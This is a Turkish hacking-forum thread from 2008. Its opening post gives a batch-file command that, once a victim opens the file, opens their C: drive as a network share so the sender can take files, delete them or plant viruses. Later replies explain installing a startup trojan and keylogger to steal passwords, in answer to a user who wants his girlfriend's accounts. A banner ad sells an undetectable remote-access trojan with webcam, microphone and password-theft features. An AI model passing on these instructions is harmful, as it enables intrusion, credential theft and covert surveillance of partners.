Yeni Başlayanlar İçin Karşı Bilgisayara Paylaşım Verme

Yeni başlayan arkadaşlar için karşı bilgisayara paylaşım vermeyi ve bu sayede karşı bilgisayara girmeyi anlatacağım yapacağınız şey çok kolay öncelikle aşşağıdaki kodu kopyalayıp boşbir notpad e kodu yapıştırın net share Konu Balamir tarafından açılmış, 4693 kişi tarafından görüntülenip, 30 yanıt almış.

Özel Yazılım Trojan+, güncellemeli ve garantili. Sadece 690TL! Kredi kartınıza 12 taksit kolaylığı!

Karşı sistemi kendi makineniniz gibi kullandıran uzaktan yönetim programı.
  • Canlı ekran izleme,vnc ve mouse kontrolü
  • Antiviruslerce %100 tanınmaz, güncelleme garantili
  • Ortam sesi dinleme
  • Webcam izleme
  • Online/offline keylogger
  • Kopyala/Yapıştır, Clipboard Yöneticisi (Canlı)
  • Warlogger desteği
  • Çalıştırma,upload,download,yeniden adlandırma,silme,gizli çalıştırma,thumbnail görüntüleme(indirmeden dosya görme)
  • Registry yöneticisi (tam özellikli)
  • Msn şifrelerini ve geçmişteki tüm adresleri çıkartma
  • Firefox şifrelerini çözme
  • Görev yöneticisi, görev sonlandırma
  • Çalışan programları listeleme
  • Bağlı sistemlerin yaptığı işlemleri tek listede görme!
  • Binder / dosya birleştirici
  • Virus tipinde resource kullanmadan bindleme özelliği
  • Mp3,resim,jpeg,vs her türlü dosya ile birleşip,exploitler ile link üzerinden,htmlden yayılır
  • Keyloggerda dll kullanmadan system hooklarıyla loglama ve tabii dll kullanmadan kimse yapamıyorken %100 sisteme zarar vermeden stabil bütün dünya dillerinde loglama.
  • Internet Explorer 9 şifre çözme
  • Chrome Şifreleri (bütün sürümler)
  • Firefox Şifreleri (bütün sürümler)
  • Internet Exporer Şifreleri (bütün sürümler)
  • Safari Şifreleri (bütün sürümler)
  • Reklam Bot ile site reklamı, dosya yükletme, bulaştırma,vs. MSN,Yahoo Messenger,ICQ ve AIM sistemlerinin hepsini tanır. Reklam bot aynı anda birden fazla sisteme komut verebilir.
  • Browserda geçmiş verileri, form girdilerini kayıt edip trojandan erişme
  • Klavye Kilitleme
  • Mouse Kilitleme
  • Masaüstü Gizleme
  • Sistemlere takılı flash/usb disk varsa bulaştırma Birden fazla sisteme aynı anda autorun oluşturabilir.
  • Uzaktan exe yükletme Aynı anda birden fazla sisteme exeleri tek komutla yükletebilir.
  • Fake sistem kilitleme. Tek tıklama ile karşı sistemi restart/yeniden başlat moduna geçmiş gösterip kilitleme. Kullanıcı fişten çekmediği sürece siz istemedikçe bilgisayarı kapatamaz, yeniden başlatamaz.
  • Karşı sistemin yeniden başlatılma talebinde masaustu ve bütün ekranı kapanıyor gibi gösterip kapanış sesini çalara kullanıcıyı bekletme. Kullanıcı sistemi kapatmak istediğinde siz izin vermezseniz windows kapanmaya çalışıyor gibi görünür ancak yonetim panelinden her türlü işlem yapılır.
  • Sistem servislerini yönetme
  • Outlook şifreleri çözme. (bütün outlook versiyonları outlook expressler dahil)
  • Otomatik güncelleme özelliği ile yakalanma durumunda kısa sürede otomatik güncelleme alma
Sadece 690 TL! Satın almak için iletişim formunu kullanabilirsiniz.

Ayrıca, iki farklı üst sürümü var:
Özel Trojan 990 TL: İstediğiniz isimle çalışıp, istediğiniz yere kopyalanır ve başlangıçta, msconfig'de, registry'de görünmez.
ÖZEL TROJAN 1490 TL: Görev yöneticisinde ve sistemin hiç bir yerinde görünmez.

Sürümler: 1200 TL: - Kimsenin bulamayacağı şekilde çalışır!> m3hm3t. 1750 TL: %100 gizlidir, RAM'de çalışır ve bentrojanim.exe olarak çalışsa dahi hiç bir yerde görünmez.

Wardom.Com.TR bir bilgisayar güvenliği sitesidir; hack konuları bilgisayar güvenliğinin ve bilgisinin uç noktaları olduğundan dolayı, kullanıcıları bu konularda bilgilendirmek ve güvenliklerini arttırmak için yazılmaktadır.

Geri Dön   Wardom.Com.TR > Bilgisayar Güvenliği > Yeni Başlayanlar İçin
Üye Ol Sözlük Üye Listesi Arama Yeni Mesajlar Forumları Okundu İşaretle

Konu Başlıkları: baslayanlar bilgisayara icin karsi paylasim verme yeni

Eski 17-01-2008, 02:13   #1
Balamir
Banned

Balamir's Avatar

Üye numarası: #975
Yer: Melbourne
Karma etkisi: 0 Balamir seviye: 2000Balamir seviye: 2000Balamir seviye: 2000Balamir seviye: 2000Balamir seviye: 2000Balamir seviye: 2000Balamir seviye: 2000Balamir seviye: 2000Balamir seviye: 2000Balamir seviye: 2000Balamir seviye: 2000
6.Oskar ödülü kazanan üyelerimiz. Wardom Destekçisi 
Yeni Başlayanlar İçin Karşı Bilgisayara Paylaşım Verme

Yeni başlayan arkadaşlar için karşı bilgisayara paylaşım vermeyi ve bu sayede karşı bilgisayara girmeyi anlatacağım yapacağınız şey çok kolay öncelikle aşşağıdaki kodu kopyalayıp boşbir notpad e kodu yapıştırın

Alıntı:
net share Balamir=c:\ /unlimited /remark:"wardom.org"
erase hack.cmdclsgoto end:end
dosyayıda farklı kaydet deyip isminide istediğiniz gibi yazıp kaydedin ben örnek koydum ismini siz istediğinizi yapabilirsiniz ama uzantısı mutlaka .bat yada cmd olmalı "örnek.bat"yada "örnek.cmd" gibi bu dosyayı kaydedip karşı tarafa msn yada mail ile gönderin karşı taraf bu dosyayı açtığında sisteminin "C" sürücüsünde Balamir adında paylaşım açar isterseniz verdiğim kod daki Balamir ismi yerine boşluk bırakmadan istediğiniz adı yazabilirsiniz o zamanda yazdığınız isimde bilgisayarın "C" sürücüsüne paylaşım açar tamamen dos kodu olduğundan dolayı antivirüs ler yada başka birşey engelleyemez en zor kısmı karşı tarafa bu dosyayı yedirmektir artık oda sizin emeğinize kalmış sonrada netscan programını indirip paylaşımdan bilgisayara girip istediğiniz dosyayı alın istediğinizi silin ister virüs sokun tamamen yapabileceklerinize kalmış birşeydir programı açıpta kendinizde denemek isterseniz hiçbir mahsuru yoktur sadece daha sonra bilgisayarımdan "C" sürücüsüne girip açılmış olan paylaşımı kapatınız network scanner programını başka bir arkadaş forumda anlatmış burdan nasıl kullanılacağı hakkında bilgi edine bilirsiniz Burdan kolay gelsin

Düzenleyen Balamir : 06-11-2010 at 15:53.
Balamir Çevrimdışı  

Görüntülediğiniz konu içerik sağlayıcı paylaşım sitelerinden biri olan Wardom Internet Adresimizde 5651 Sayılı Kanunun 8. Maddesine ve T.C.Knın 125. Maddesine göre yayınlanmakta olup içeriğinden yazarı sorumludur. Bu konu hakkında yapılacak tüm hukuksal şikayetler için webmaster \@wardom.org adresi ile iletişime geçilmesi halinde ilgili kanunlar ve yönetmelikler çerçevesinde en geç 3 (üç) gün içerisinde Wardom yönetimi olarak tarafımızca gereken işlemler yapılacak ve avukatlarımız size dönüş yapacaktır.
Eski 24-01-2008, 12:15   #2
teayaman
Çırak

Üye numarası: #186608
Karma etkisi: 0 teayaman seviye: 10

olmuyor denedim ben bunu
teayaman Çevrimdışı  

Eski 24-01-2008, 14:04   #3
Balamir
Banned

Balamir's Avatar

Karma etkisi: 0 Balamir seviye: 2000Balamir seviye: 2000Balamir seviye: 2000Balamir seviye: 2000Balamir seviye: 2000Balamir seviye: 2000Balamir seviye: 2000Balamir seviye: 2000Balamir seviye: 2000Balamir seviye: 2000Balamir seviye: 2000

Alıntı:
Orjinal Mesaj Sahibi teayaman Mesajı Göster
olmuyor denedim ben bunu
Nesi olmuyor arkadaşım söyle yardımcı olayım dosyayı dediğim gibi yap uzantısını .bat yap kendinde çalıştır makinanda "C" paylaşıma açılmışmı açılmamışmı bak bakalım sonrada paylaşımı tekrar kapatırsın ben bu foruma birşeyi denemeden kendim kullanmadan birşeyi paylaşmıyorum ilginize teşekkürler
Balamir Çevrimdışı  

Eski 24-01-2008, 19:24   #4
mbk_kbm
Forum Kalfası

mbk_kbm's Avatar

Üye numarası: #130925
Yer: !stanbul
Karma etkisi: 5166 mbk_kbm seviye: 2000mbk_kbm seviye: 2000mbk_kbm seviye: 2000mbk_kbm seviye: 2000mbk_kbm seviye: 2000mbk_kbm seviye: 2000mbk_kbm seviye: 2000mbk_kbm seviye: 2000mbk_kbm seviye: 2000mbk_kbm seviye: 2000mbk_kbm seviye: 2000

güzel paylaşım...

Kod:
net share Balamir /d
bu da Balamir paylaşımını kapatır..
mbk_kbm Çevrimdışı  

Eski 26-01-2008, 00:23   #5
zagorxxtenay
Çırak

Üye numarası: #189684
Karma etkisi: 0 zagorxxtenay seviye: 350zagorxxtenay seviye: 350zagorxxtenay seviye: 350zagorxxtenay seviye: 350

Alıntı:
Orjinal Mesaj Sahibi Balamir Mesajı Göster
Yeni başlayan arkadaşlar için karşı bilgisayara paylaşım vermeyi ve bu sayede karşı bilgisayara girmeyi anlatacağım yapacağınız şey çok kolay öncelikle aşşağıdaki kodu kopyalayıp boşbir notpad e kodu yapıştırın

dosyayıda farklı kaydet deyip isminide istediğiniz gibi yazıp kaydedin ben örnek koydum ismini siz istediğinizi yapabilirsiniz ama uzantısı mutlaka .bat yada cmd olmalı "örnek.bat"yada "örnek.cmd" gibi bu dosyayı kaydedip karşı tarafa msn yada mail ile gönderin karşı taraf bu dosyayı açtığında sisteminin "C" sürücüsünde Balamir adında paylaşım açar isterseniz verdiğim kod daki Balamir ismi yerine boşluk bırakmadan istediğiniz adı yazabilirsiniz o zamanda yazdığınız isimde bilgisayarın "C" sürücüsüne paylaşım açar tamamen dos kodu olduğundan dolayı antivirüs ler yada başka birşey engelleyemez en zor kısmı karşı tarafa bu dosyayı yedirmektir artık oda sizin emeğinize kalmış sonrada netscan programını indirip paylaşımdan bilgisayara girip istediğiniz dosyayı alın istediğinizi silin ister virüs sokun tamamen yapabileceklerinize kalmış birşeydir programı açıpta kendinizde denemek isterseniz hiçbir mahsuru yoktur sadece daha sonra bilgisayarımdan "C" sürücüsüne girip açılmış olan paylaşımı kapatınız network scanner programını başka bir arkadaş forumda anlatmış burdan nasıl kullanılacağı hakkında bilgi edine bilirsiniz Burdan kolay gelsin
üstad ben yeniyim ve bu tip konularla çok ilgileniyorum pc hakkında herbilgiyi seviyorum amacım kendimi geliştirmek buda sizin gibi deneyimli kişilerden alacagım bilgilerle mümkün olacaktır .size 3 sorum olacak 1.üstad bu dosyayı msn den birine yollayıp açtırdık diyelim ondan sonra bu kişinin pc ye ben nasıl ulaşacagım?2 bir kişinin msn şifresini nasıl ögreniriz? 3 bir kişinin üye oldugu bir arkadaşlık sitesinin şifresini nasıl ögreniriz ? tahmin edeceginiz gibi kız arkadaşımın şifrelerini ögrenmek istiyorum bakalım bu kız ne kadar harbi bana karşı selamlar üstad..
zagorxxtenay Çevrimdışı  

Eski 26-01-2008, 03:10   #6
Balamir
Banned

Balamir's Avatar

Alıntı:
Orjinal Mesaj Sahibi zagorxxtenay Mesajı Göster
üstad ben yeniyim ve bu tip konularla çok ilgileniyorum pc hakkında herbilgiyi seviyorum amacım kendimi geliştirmek buda sizin gibi deneyimli kişilerden alacagım bilgilerle mümkün olacaktır .size 3 sorum olacak 1.üstad bu dosyayı msn den birine yollayıp açtırdık diyelim ondan sonra bu kişinin pc ye ben nasıl ulaşacagım?2 bir kişinin msn şifresini nasıl ögreniriz? 3 bir kişinin üye oldugu bir arkadaşlık sitesinin şifresini nasıl ögreniriz ? tahmin edeceginiz gibi kız arkadaşımın şifrelerini ögrenmek istiyorum bakalım bu kız ne kadar harbi bana karşı selamlar üstad..
(Öncelikle zagorxxtenay Arkadaşım yardım istemek için lütfen Profilime Mesaj Yazmayınız Profilimizdeki Mesaj Bölümü Benim Hakkımda Yazılan Yorum Mesajlar Bölümüdür Yardım Almak İçin Önce Forumu Sonrada Özel Mesaj Bölümünü Kullanınız Saygılarımla) Arkadaşım mesela bu dosyayı msn ile karşı tarafa gönderdin ve karşı tarafta bu .bat dosyasını açtı sisteminde paylaşım açılmış oldu ondan sonra karşı tarafın ip numarası ile network scanner yada R3x gibi programları kullanarak karşı tarafın bilgisayarına giriş yaparsın sonrada bilgisayara güzel bir trojan atarsın bunuda bat dosyası kodu ile otomatik çalışmasını sağlarsın bunuda C:\Documents and Settings\Administrator(kullanıcı ismi)\Start Menu\Programlar\Başlangıç klasörüne koyduğun zaman makina kapanıp açıldıktan sonra senin trojanın çalışmaya başlar ve senin vermiş olduğun mail adresine şifreleri gelir zaten kullandığın trojanın özellikleri karşı tarafın ip adresini gönderme ve bunun gibi özellikleride varsa eğer daha iyi olur bu seferde keylog tutarsın girmiş olduğu site şifrelerini msn şifrelerini hepsini alırsın yani bir programla değilde mantığınla hareket edersen eğer bir kaç program ile karşı tarafın şifrelerini alırsın herşey senin bilgine ve mantığına dayalıdır bunu unutma kolay gelsin

Düzenleyen Balamir : 26-01-2008 at 05:13.
Balamir Çevrimdışı  

Eski 23-03-2008, 21:21   #7
kalfa76
Çırak

Üye numarası: #196959
Karma etkisi: 0 kalfa76 seviye: 10

Sn balamir bence çok faydalı bilgiler veriyorsunuz kim ne derse desin özellikle bu bu türde bilgileri bizlerle paylaymaya devam edin emeginize tşk ler
kalfa76 Çevrimdışı  

Eski 23-03-2008, 21:56   #8
Balamir
Banned

Balamir's Avatar

Alıntı:
Orjinal Mesaj Sahibi kalfa76 Mesajı Göster
Sn balamir bence çok faydalı bilgiler veriyorsunuz kim ne derse desin özellikle bu bu türde bilgileri bizlerle paylaymaya devam edin emeginize tşk ler
Öncelikle teşekkür ederim elimden geldiğince bilgilerimin doğrultusunda herkeze yardımcı olmaya çalışıyorum ama birisinin ayrıca böyle teşekkür etmesi hoşumada gitmedide değil bu forumdaki herkez bir aile bilgilerimizi herkezle paylaşmak ve yardım etmek üzere çalışıyoruz bir karşılıkta beklemiyoruz sonuçta bir insana yardım etmek ve onu mutlu etmek bence en güzeli zaten forumda birçok arkadaşımız wardom u bir aile olarak görüyor msn den cep telefonundan sürekli konuşuyoruz bir birlerimize yardımcı olmaya çalışıyoruz böyle bir arkadaşlık kardeşlik platforumu başka bir yerde'de yok hepinize tekrar teşekkür ederim Saygılarımla
Balamir Çevrimdışı  

Eski 23-03-2008, 23:07   #9
fnart
Daimi Üye

fnart's Avatar

Üye numarası: #156020
Karma etkisi: 440 fnart seviye: 2000fnart seviye: 2000fnart seviye: 2000fnart seviye: 2000fnart seviye: 2000fnart seviye: 2000fnart seviye: 2000fnart seviye: 2000fnart seviye: 2000fnart seviye: 2000fnart seviye: 2000

Alıntı:
Orjinal Mesaj Sahibi Balamir Mesajı Göster
(Öncelikle zagorxxtenay Arkadaşım yardım istemek için lütfen Profilime Mesaj Yazmayınız Profilimizdeki Mesaj Bölümü Benim Hakkımda Yazılan Yorum Mesajlar Bölümüdür Yardım Almak İçin Önce Forumu Sonrada Özel Mesaj Bölümünü Kullanınız Saygılarımla) Arkadaşım mesela bu dosyayı msn ile karşı tarafa gönderdin ve karşı tarafta bu .bat dosyasını açtı sisteminde paylaşım açılmış oldu ondan sonra karşı tarafın ip numarası ile network scanner yada R3x gibi programları kullanarak karşı tarafın bilgisayarına giriş yaparsın sonrada bilgisayara güzel bir trojan atarsın bunuda bat dosyası kodu ile otomatik çalışmasını sağlarsın bunuda C:\Documents and Settings\Administrator(kullanıcı ismi)\Start Menu\Programlar\Başlangıç klasörüne koyduğun zaman makina kapanıp açıldıktan sonra senin trojanın çalışmaya başlar ve senin vermiş olduğun mail adresine şifreleri gelir zaten kullandığın trojanın özellikleri karşı tarafın ip adresini gönderme ve bunun gibi özellikleride varsa eğer daha iyi olur bu seferde keylog tutarsın girmiş olduğu site şifrelerini msn şifrelerini hepsini alırsın yani bir programla değilde mantığınla hareket edersen eğer bir kaç program ile karşı tarafın şifrelerini alırsın herşey senin bilgine ve mantığına dayalıdır bunu unutma kolay gelsin
slm arkadaşım bunu nsl bat yapıcam ve bunu karşı tarafa gönderdikten sonra karşı taraftaki kişinin ip nosunu nsl bulucam da giricem kusura bakma biraz masraflı olduk
fnart Çevrimdışı  

Eski 25-03-2008, 19:03   #10
Balamir
Banned

Balamir's Avatar

Alıntı:
Orjinal Mesaj Sahibi fnart Mesajı Göster
slm arkadaşım bunu nsl bat yapıcam ve bunu karşı tarafa gönderdikten sonra karşı taraftaki kişinin ip nosunu nsl bulucam da giricem kusura bakma biraz masraflı olduk
Öncelikle bir tane boş notpade dosyası açacaksın kodları aynen kopyala ve yapıştır sonrada dosyadan>farklı kaydet diyeceksin dosyasının adın yazacaksın mesela dosyanın adı deneme sen deneme.bat yazıp alt tarafta kayıt türü yazar ona tıkla ve karşına "tüm dosyalar" yazan bir yer çıkacak onu seçip kaydedeceksin hepsi bu kadar gelelim diğer sormuş olduğun sorulara karşı tarafın ip adresini bulmanın bir çok yolu var mesela msn den konuşuyorsun karşı tarafla sen makinana msn discovery programını yükliyeceksin o program sayesinde karşı tarafın ip adresini gösteriyor ve bu şekilde ip adresini alabilirsin forumda zaten karşı tarafın ip adresini almak için bir çok yöntem anlatıldı bir çoğuda işlevini gerçekten gerçekleştiriyor forumda arama yaparak daha fazla bilgiye ve programa ulaşabilirsin kolay gelsin Saygılarımla

Düzenleyen Balamir : 25-03-2008 at 19:06.
Balamir Çevrimdışı  

Eski 25-03-2008, 23:03   #11
tunceraydemir28
Çırak

Üye numarası: #155574
Karma etkisi: 0 tunceraydemir28 seviye: 10

abi bişey sorcam yaw msn discovery den ip adresini nası alıoz.d bn de msn discovery var ama bunu ilk kez duydum:d nası yapıldığını biraz açıklarsa

emeğine sağlık (klavyen dert görmesin)
tunceraydemir28 Çevrimdışı  

Eski 26-03-2008, 21:10   #12
Balamir
Banned

Balamir's Avatar

Alıntı:
Orjinal Mesaj Sahibi tunceraydemir28 Mesajı Göster
abi bişey sorcam yaw msn discovery den ip adresini nası alıoz.d bn de msn discovery var ama bunu ilk kez duydum:d nası yapıldığını biraz açıklarsa

emeğine sağlık (klavyen dert görmesin)
Bu bilgi forumda mevcut bir kaç arkadaş anlatmıştı arama yaparak kolaylıkla bulabilirsiniz ayrıca TCPView for Windows v2.53 programını kullanarakta ip adreslerini bulma şansınız artıyor en azından programın açıklamasaında öyle yazıyor şahsen denemedim

Buradan İndire Bilirsiniz
Balamir Çevrimdışı  

Eski 31-07-2008, 17:49   #13
foreveryouu
Çırak

Üye numarası: #246359
Karma etkisi: 0 foreveryouu seviye: 10

valla tebrikler balamir öyle güzel oluyorki hemde bir çocuk bile yapabilir yani ))))))))))
foreveryouu Çevrimdışı  

Eski 01-08-2008, 23:18   #14
serserynm
Çırak

Üye numarası: #202685
Karma etkisi: 0 serserynm seviye: 10

teşekkürler gayet güzel anlatmışınız ama pc de bu tarz işlerle uğraşmayan bi kişi için ( yani ben) genede hafifi bulutlu olmuş.denicem bakalım ne kadarını yapabilicem
serserynm Çevrimdışı  

Eski 22-08-2008, 17:07   #15
anakondax
Cool Üye

anakondax's Avatar

Üye numarası: #131872
Karma etkisi: 13 anakondax seviye: 650anakondax seviye: 650anakondax seviye: 650anakondax seviye: 650anakondax seviye: 650anakondax seviye: 650anakondax seviye: 650
Kullanıcıya MSN yolu ile mesaj gönder

anlatım için teşekkür ederim ellerinize ve emeğinize sağlık
anakondax Çevrimdışı  

Kapalı Konu

Şu Anda Konuyu Görüntüleyenler: 1 (0 üye ve 1 misafir)

Konu Araçları Bu Konuda Ara
Bu Konuda Ara:

Gelişmiş Arama

Gönderme Kuralları